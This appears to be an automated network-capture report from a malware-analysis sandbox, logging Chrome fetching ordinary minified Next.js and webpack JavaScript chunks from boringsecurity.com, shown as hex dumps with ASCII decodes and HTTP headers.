                                                                          Data Ascii: fault.__esModule&&(Object.defineProperty(t.default,"__esModule",{value:!0}),Object.assign(t.default,t),e.exports=t.default)},72077:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.detectDomainLocale=void 0,t.detectDomainLoca
                                                                          2023-12-10 16:44:48 UTC5930INData Raw: 75 6e 63 74 69 6f 6e 20 56 28 29 7b 72 65 74 75 72 6e 28 56 3d 67 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2c 61 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 5f 5f 4e 45 58 54 5f 44 41 54 41 5f 5f 22 29 2e 74 65 78 74 43 6f 6e 74 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 44 41 54 41 5f 5f 3d 61 2c 68 3d 61 2e 64 65 66 61 75 6c 74 4c 6f 63 61 6c 65 3b 6c 65 74 20 65 3d 61 2e 61 73 73 65 74 50 72 65 66 69 78 7c 7c 22 22 3b 72 2e 70 3d 22 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 5f 6e 65 78 74 2f 22 29 2c 43 2e 73 65 74
                                                                          Data Ascii: unction V(){return(V=g(function*(){arguments.length>0&&void 0!==arguments[0]&&arguments[0],a=JSON.parse(document.getElementById("__NEXT_DATA__").textContent),window.__NEXT_DATA__=a,h=a.defaultLocale;let e=a.assetPrefix||"";r.p="".concat(e,"/_next/"),C.set
                                                                          2023-12-10 16:44:48 UTC7116INData Raw: 65 65 3d 21 31 7d 28 69 2c 65 3d 3e 5f 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 61 2c 7b 63 61 6c 6c 62 61 63 6b 73 3a 5b 65 2c 68 5d 7d 2c 5f 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 5f 2e 64 65 66 61 75 6c 74 2e 53 74 72 69 63 74 4d 6f 64 65 2c 6e 75 6c 6c 2c 6d 29 29 29 2c 70 7d 66 75 6e 63 74 69 6f 6e 20 65 6c 28 65 29 7b 72 65 74 75 72 6e 20 65 69 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 65 69 28 29 7b 72 65 74 75 72 6e 28 65 69 3d 67 28 66 75 6e 63 74 69 6f 6e 2a 28 65 29 7b 69 66 28 65 2e 65 72 72 29 7b 79 69 65 6c 64 20 4b 28 65 29 3b 72 65 74 75 72 6e 7d 74 72 79 7b 79 69 65 6c 64 20 65 6f 28 65 29 7d 63 61 74 63 68 28 72 29 7b 6c 65
                                                                          Data Ascii: ee=!1}(i,e=>_.default.createElement(ea,{callbacks:[e,h]},_.default.createElement(_.default.StrictMode,null,m))),p}function el(e){return ei.apply(this,arguments)}function ei(){return(ei=g(function*(e){if(e.err){yield K(e);return}try{yield eo(e)}catch(r){le
                                                                          2023-12-10 16:44:48 UTC8302INData Raw: 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2e 72 65 71 75 65 73 74 49 64 6c 65 43 61 6c 6c 62 61 63 6b 26 26 73 65 6c 66 2e 72 65 71 75 65 73 74 49 64 6c 65 43 61 6c 6c 62 61 63 6b 2e 62 69 6e 64 28 77 69 6e 64 6f 77 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 72 65 74 75 72 6e 20 73 65 6c 66 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 28 7b 64 69 64 54 69 6d 65 6f 75 74 3a 21 31 2c 74 69 6d 65 52 65 6d 61 69 6e 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 30 2c 35 30 2d 28 44 61 74 65 2e 6e 6f 77 28 29 2d 74 29 29 7d 7d 29 7d 2c 31 29 7d 3b 74 2e 72 65 71 75 65 73 74 49 64 6c 65 43 61 6c 6c 62 61 63
                                                                          Data Ascii: ined"!=typeof self&&self.requestIdleCallback&&self.requestIdleCallback.bind(window)||function(e){let t=Date.now();return self.setTimeout(function(){e({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-t))}})},1)};t.requestIdleCallbac
                                                                          2023-12-10 16:44:48 UTC6188INData Raw: 29 2c 64 3d 72 28 33 38 37 37 39 29 3b 6c 65 74 20 66 3d 6e 65 77 20 4d 61 70 2c 70 3d 6e 65 77 20 53 65 74 2c 68 3d 5b 22 6f 6e 4c 6f 61 64 22 2c 22 6f 6e 52 65 61 64 79 22 2c 22 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 22 2c 22 63 68 69 6c 64 72 65 6e 22 2c 22 6f 6e 45 72 72 6f 72 22 2c 22 73 74 72 61 74 65 67 79 22 5d 2c 6d 3d 65 3d 3e 7b 6c 65 74 7b 73 72 63 3a 74 2c 69 64 3a 72 2c 6f 6e 4c 6f 61 64 3a 6e 3d 28 29 3d 3e 7b 7d 2c 6f 6e 52 65 61 64 79 3a 61 3d 6e 75 6c 6c 2c 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 3a 6f 2c 63 68 69 6c 64 72 65 6e 3a 6c 3d 22 22 2c 73 74 72 61 74 65 67 79 3a 69 3d 22 61 66 74 65 72 49 6e 74 65 72 61 63 74 69 76 65 22 2c 6f 6e 45 72 72 6f 72 3a 73 7d 3d 65 2c 75 3d
                                                                          Data Ascii: ),d=r(38779);let f=new Map,p=new Set,h=["onLoad","onReady","dangerouslySetInnerHTML","children","onError","strategy"],m=e=>{let{src:t,id:r,onLoad:n=()=>{},onReady:a=null,dangerouslySetInnerHTML:o,children:l="",strategy:i="afterInteractive",onError:s}=e,u=
                                                                          2023-12-10 16:44:48 UTC10674INData Raw: 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 33 29 7d 7d 22 3a 22 22 29 7d 7d 29 2c 65 3f 6f 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 68 31 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6e 65 78 74 2d 65 72 72 6f 72 2d 68 31 22 2c 73 74 79 6c 65 3a 75 2e 68 31 7d 2c 65 29 3a 6e 75 6c 6c 2c 6f 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 73 74 79 6c 65 3a 75 2e 64 65 73 63 7d 2c 6f 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 68 32 22 2c 7b 73 74 79 6c 65 3a 75 2e 68 32 7d 2c 74 68 69 73 2e 70 72 6f 70 73 2e 74 69 74 6c 65 7c 7c 65 3f 72 3a 6f 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e
                                                                          Data Ascii: ight:1px solid rgba(255,255,255,.3)}}":"")}}),e?o.default.createElement("h1",{className:"next-error-h1",style:u.h1},e):null,o.default.createElement("div",{style:u.desc},o.default.createElement("h2",{style:u.h2},this.props.title||e?r:o.default.createElemen


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          81192.168.2.54980975.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:48 UTC571OUTGET /_next/static/chunks/pages/_app-82695a3e9af0e644.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:48 UTC424INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 33 36 35 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 38 20 47 4d 54 0d 0a 45 74 61 67 3a
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 536517Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:48 GMTEtag:
                                                                          2023-12-10 16:44:48 UTC762INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 38 38 5d 2c 7b 36 30 35 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 6e 3d 72 28 35 35 35 34 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 32 29 29 2c 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 30 29 2c 74 5b 72 2b 30 5d 3d 65 3e 3e 3e 38 2c 74 5b 72 2b 31
                                                                          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[888],{6050:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var n=r(5554);function i(e,t,r){return void 0===t&&(t=new Uint8Array(2)),void 0===r&&(r=0),t[r+0]=e>>>8,t[r+1
                                                                          2023-12-10 16:44:48 UTC2372INData Raw: 72 26 26 28 72 3d 30 29 2c 74 5b 72 2b 30 5d 3d 65 3e 3e 3e 32 34 2c 74 5b 72 2b 31 5d 3d 65 3e 3e 3e 31 36 2c 74 5b 72 2b 32 5d 3d 65 3e 3e 3e 38 2c 74 5b 72 2b 33 5d 3d 65 3e 3e 3e 30 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 34 29 29 2c 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 30 29 2c 74 5b 72 2b 30 5d 3d 65 3e 3e 3e 30 2c 74 5b 72 2b 31 5d 3d 65 3e 3e 3e 38 2c 74 5b 72 2b 32 5d 3d 65 3e 3e 3e 31 36 2c 74 5b 72 2b 33 5d 3d 65 3e 3e 3e 32 34 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 38 29
                                                                          Data Ascii: r&&(r=0),t[r+0]=e>>>24,t[r+1]=e>>>16,t[r+2]=e>>>8,t[r+3]=e>>>0,t}function f(e,t,r){return void 0===t&&(t=new Uint8Array(4)),void 0===r&&(r=0),t[r+0]=e>>>0,t[r+1]=e>>>8,t[r+2]=e>>>16,t[r+3]=e>>>24,t}function h(e,t,r){return void 0===t&&(t=new Uint8Array(8)
                                                                          2023-12-10 16:44:48 UTC538INData Raw: 55 69 6e 74 4c 45 20 73 75 70 70 6f 72 74 73 20 6f 6e 6c 79 20 62 69 74 4c 65 6e 67 74 68 73 20 64 69 76 69 73 69 62 6c 65 20 62 79 20 38 22 29 3b 69 66 28 21 6e 2e 69 73 53 61 66 65 49 6e 74 65 67 65 72 28 74 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 77 72 69 74 65 55 69 6e 74 4c 45 20 76 61 6c 75 65 20 6d 75 73 74 20 62 65 20 61 6e 20 69 6e 74 65 67 65 72 22 29 3b 66 6f 72 28 76 61 72 20 6f 3d 31 2c 61 3d 69 3b 61 3c 69 2b 65 2f 38 3b 61 2b 2b 29 72 5b 61 5d 3d 74 2f 6f 26 32 35 35 2c 6f 2a 3d 32 35 36 3b 72 65 74 75 72 6e 20 72 7d 2c 74 2e 72 65 61 64 46 6c 6f 61 74 33 32 42 45 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 30 29 2c 6e 65 77 20 44 61 74 61 56 69 65 77 28 65 2e 62 75 66
                                                                          Data Ascii: UintLE supports only bitLengths divisible by 8");if(!n.isSafeInteger(t))throw Error("writeUintLE value must be an integer");for(var o=1,a=i;a<i+e/8;a++)r[a]=t/o&255,o*=256;return r},t.readFloat32BE=function(e,t){return void 0===t&&(t=0),new DataView(e.buf
                                                                          2023-12-10 16:44:48 UTC4744INData Raw: 74 29 7d 2c 74 2e 72 65 61 64 46 6c 6f 61 74 36 34 4c 45 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 30 29 2c 6e 65 77 20 44 61 74 61 56 69 65 77 28 65 2e 62 75 66 66 65 72 2c 65 2e 62 79 74 65 4f 66 66 73 65 74 2c 65 2e 62 79 74 65 4c 65 6e 67 74 68 29 2e 67 65 74 46 6c 6f 61 74 36 34 28 74 2c 21 30 29 7d 2c 74 2e 77 72 69 74 65 46 6c 6f 61 74 33 32 42 45 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 34 29 29 2c 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 30 29 2c 6e 65 77 20 44 61 74 61 56 69 65 77 28 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e
                                                                          Data Ascii: t)},t.readFloat64LE=function(e,t){return void 0===t&&(t=0),new DataView(e.buffer,e.byteOffset,e.byteLength).getFloat64(t,!0)},t.writeFloat32BE=function(e,t,r){return void 0===t&&(t=new Uint8Array(4)),void 0===r&&(r=0),new DataView(t.buffer,t.byteOffset,t.
                                                                          2023-12-10 16:44:48 UTC5930INData Raw: 65 55 69 6e 74 33 32 4c 45 28 6d 2b 32 30 33 36 34 37 37 32 33 34 7c 30 2c 65 2c 38 29 2c 6e 2e 77 72 69 74 65 55 69 6e 74 33 32 4c 45 28 62 2b 31 37 39 37 32 38 35 32 33 36 7c 30 2c 65 2c 31 32 29 2c 6e 2e 77 72 69 74 65 55 69 6e 74 33 32 4c 45 28 77 2b 69 7c 30 2c 65 2c 31 36 29 2c 6e 2e 77 72 69 74 65 55 69 6e 74 33 32 4c 45 28 5f 2b 6f 7c 30 2c 65 2c 32 30 29 2c 6e 2e 77 72 69 74 65 55 69 6e 74 33 32 4c 45 28 45 2b 61 7c 30 2c 65 2c 32 34 29 2c 6e 2e 77 72 69 74 65 55 69 6e 74 33 32 4c 45 28 4f 2b 73 7c 30 2c 65 2c 32 38 29 2c 6e 2e 77 72 69 74 65 55 69 6e 74 33 32 4c 45 28 44 2b 75 7c 30 2c 65 2c 33 32 29 2c 6e 2e 77 72 69 74 65 55 69 6e 74 33 32 4c 45 28 53 2b 63 7c 30 2c 65 2c 33 36 29 2c 6e 2e 77 72 69 74 65 55 69 6e 74 33 32 4c 45 28 6b 2b 6c 7c
                                                                          Data Ascii: eUint32LE(m+2036477234|0,e,8),n.writeUint32LE(b+1797285236|0,e,12),n.writeUint32LE(w+i|0,e,16),n.writeUint32LE(_+o|0,e,20),n.writeUint32LE(E+a|0,e,24),n.writeUint32LE(O+s|0,e,28),n.writeUint32LE(D+u|0,e,32),n.writeUint32LE(S+c|0,e,36),n.writeUint32LE(k+l|
                                                                          2023-12-10 16:44:48 UTC7116INData Raw: 38 5d 3d 28 75 3e 3e 3e 38 7c 63 3c 3c 38 29 26 38 31 39 31 2c 74 68 69 73 2e 5f 72 5b 39 5d 3d 63 3e 3e 3e 35 26 31 32 37 2c 74 68 69 73 2e 5f 70 61 64 5b 30 5d 3d 65 5b 31 36 5d 7c 65 5b 31 37 5d 3c 3c 38 2c 74 68 69 73 2e 5f 70 61 64 5b 31 5d 3d 65 5b 31 38 5d 7c 65 5b 31 39 5d 3c 3c 38 2c 74 68 69 73 2e 5f 70 61 64 5b 32 5d 3d 65 5b 32 30 5d 7c 65 5b 32 31 5d 3c 3c 38 2c 74 68 69 73 2e 5f 70 61 64 5b 33 5d 3d 65 5b 32 32 5d 7c 65 5b 32 33 5d 3c 3c 38 2c 74 68 69 73 2e 5f 70 61 64 5b 34 5d 3d 65 5b 32 34 5d 7c 65 5b 32 35 5d 3c 3c 38 2c 74 68 69 73 2e 5f 70 61 64 5b 35 5d 3d 65 5b 32 36 5d 7c 65 5b 32 37 5d 3c 3c 38 2c 74 68 69 73 2e 5f 70 61 64 5b 36 5d 3d 65 5b 32 38 5d 7c 65 5b 32 39 5d 3c 3c 38 2c 74 68 69 73 2e 5f 70 61 64 5b 37 5d 3d 65 5b 33 30
                                                                          Data Ascii: 8]=(u>>>8|c<<8)&8191,this._r[9]=c>>>5&127,this._pad[0]=e[16]|e[17]<<8,this._pad[1]=e[18]|e[19]<<8,this._pad[2]=e[20]|e[21]<<8,this._pad[3]=e[22]|e[23]<<8,this._pad[4]=e[24]|e[25]<<8,this._pad[5]=e[26]|e[27]<<8,this._pad[6]=e[28]|e[29]<<8,this._pad[7]=e[30
                                                                          2023-12-10 16:44:48 UTC8302INData Raw: 53 6f 75 72 63 65 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 69 66 28 74 68 69 73 2e 69 73 41 76 61 69 6c 61 62 6c 65 3d 21 31 2c 74 68 69 73 2e 6e 61 6d 65 3d 22 22 2c 74 68 69 73 2e 5f 73 6f 75 72 63 65 3d 6e 65 77 20 6e 2e 42 72 6f 77 73 65 72 52 61 6e 64 6f 6d 53 6f 75 72 63 65 2c 74 68 69 73 2e 5f 73 6f 75 72 63 65 2e 69 73 41 76 61 69 6c 61 62 6c 65 29 7b 74 68 69 73 2e 69 73 41 76 61 69 6c 61 62 6c 65 3d 21 30 2c 74 68 69 73 2e 6e 61 6d 65 3d 22 42 72 6f 77 73 65 72 22 3b 72 65 74 75 72 6e 7d 69 66 28 74 68 69 73 2e 5f 73 6f 75 72 63 65 3d 6e 65 77 20 69 2e 4e 6f 64 65 52 61 6e 64 6f 6d 53 6f 75 72 63 65 2c 74 68 69 73 2e 5f 73 6f 75 72 63 65 2e 69 73 41 76 61 69 6c 61 62 6c 65 29 7b 74 68 69 73 2e 69 73 41 76 61 69 6c 61 62 6c
                                                                          Data Ascii: Source=class{constructor(){if(this.isAvailable=!1,this.name="",this._source=new n.BrowserRandomSource,this._source.isAvailable){this.isAvailable=!0,this.name="Browser";return}if(this._source=new i.NodeRandomSource,this._source.isAvailable){this.isAvailabl
                                                                          2023-12-10 16:44:48 UTC6188INData Raw: 36 35 35 33 36 2a 69 2c 69 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 6e 3d 68 2b 69 2b 36 35 35 33 35 29 2f 36 35 35 33 36 29 2c 68 3d 6e 2d 36 35 35 33 36 2a 69 2c 69 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 6e 3d 64 2b 69 2b 36 35 35 33 35 29 2f 36 35 35 33 36 29 2c 64 3d 6e 2d 36 35 35 33 36 2a 69 2c 69 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 6e 3d 70 2b 69 2b 36 35 35 33 35 29 2f 36 35 35 33 36 29 2c 70 3d 6e 2d 36 35 35 33 36 2a 69 2c 69 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 6e 3d 79 2b 69 2b 36 35 35 33 35 29 2f 36 35 35 33 36 29 2c 79 3d 6e 2d 36 35 35 33 36 2a 69 2c 69 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 6e 3d 67 2b 69 2b 36 35 35 33 35 29 2f 36 35 35 33 36 29 2c 67 3d 6e 2d 36 35 35 33 36 2a 69 2c 69 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 6e 3d 76
                                                                          Data Ascii: 65536*i,i=Math.floor((n=h+i+65535)/65536),h=n-65536*i,i=Math.floor((n=d+i+65535)/65536),d=n-65536*i,i=Math.floor((n=p+i+65535)/65536),p=n-65536*i,i=Math.floor((n=y+i+65535)/65536),y=n-65536*i,i=Math.floor((n=g+i+65535)/65536),g=n-65536*i,i=Math.floor((n=v
                                                                          2023-12-10 16:44:48 UTC10674INData Raw: 5a 7d 2c 49 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 59 7d 2c 68 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 31 7d 2c 51 38 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 47 7d 2c 6f 38 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 4b 7d 2c 71 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7a 7d 2c 44 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 32 7d 2c 24 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 74 7d 2c 6e 66 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 69 7d 2c 51 30 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 37 7d 2c 69 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 33 7d 2c 70 38 3a
                                                                          Data Ascii: Z},Ih:function(){return eY},h1:function(){return e1},Q8:function(){return G},o8:function(){return eK},qt:function(){return ez},Dd:function(){return e2},$t:function(){return tt},nf:function(){return ti},Q0:function(){return e7},in:function(){return e3},p8:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          82192.168.2.54981375.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:48 UTC569OUTGET /_next/static/chunks/d3a2d874-4eb3a08696765140.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:48 UTC423INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 38 33 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 38 20 47 4d 54 0d 0a 45 74 61 67 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 58346Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:48 GMTEtag:
                                                                          2023-12-10 16:44:48 UTC763INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 36 34 5d 2c 7b 39 38 37 37 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 28 65 3d 6e 2e 6e 6d 64 28 65 29 29 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 72 65 74 75 72 6e 20 71 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 7c 7c 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74
                                                                          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[964],{98777:function(e,t,n){(e=n.nmd(e)).exports=function(){"use strict";function t(){return q.apply(null,arguments)}function n(e){return e instanceof Array||"[object Array]"===Object.prototype.toSt
                                                                          2023-12-10 16:44:48 UTC2372INData Raw: 2e 63 61 6c 6c 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 76 61 72 20 6e 2c 73 3d 5b 5d 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 6e 3d 30 3b 6e 3c 69 3b 2b 2b 6e 29 73 2e 70 75 73 68 28 74 28 65 5b 6e 5d 2c 6e 29 29 3b 72 65 74 75 72 6e 20 73 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 74 29 69 28 74 2c 6e 29 26 26 28 65 5b 6e 5d 3d 74 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 69 28 74 2c 22 74 6f 53 74 72 69 6e 67 22 29 26 26 28 65 2e 74 6f 53 74 72 69 6e 67 3d 74 2e 74 6f 53 74 72 69 6e 67 29 2c 69 28 74 2c 22 76 61 6c 75 65 4f 66 22 29 26 26 28 65 2e 76 61 6c 75 65 4f 66 3d 74 2e 76 61 6c 75 65 4f 66 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 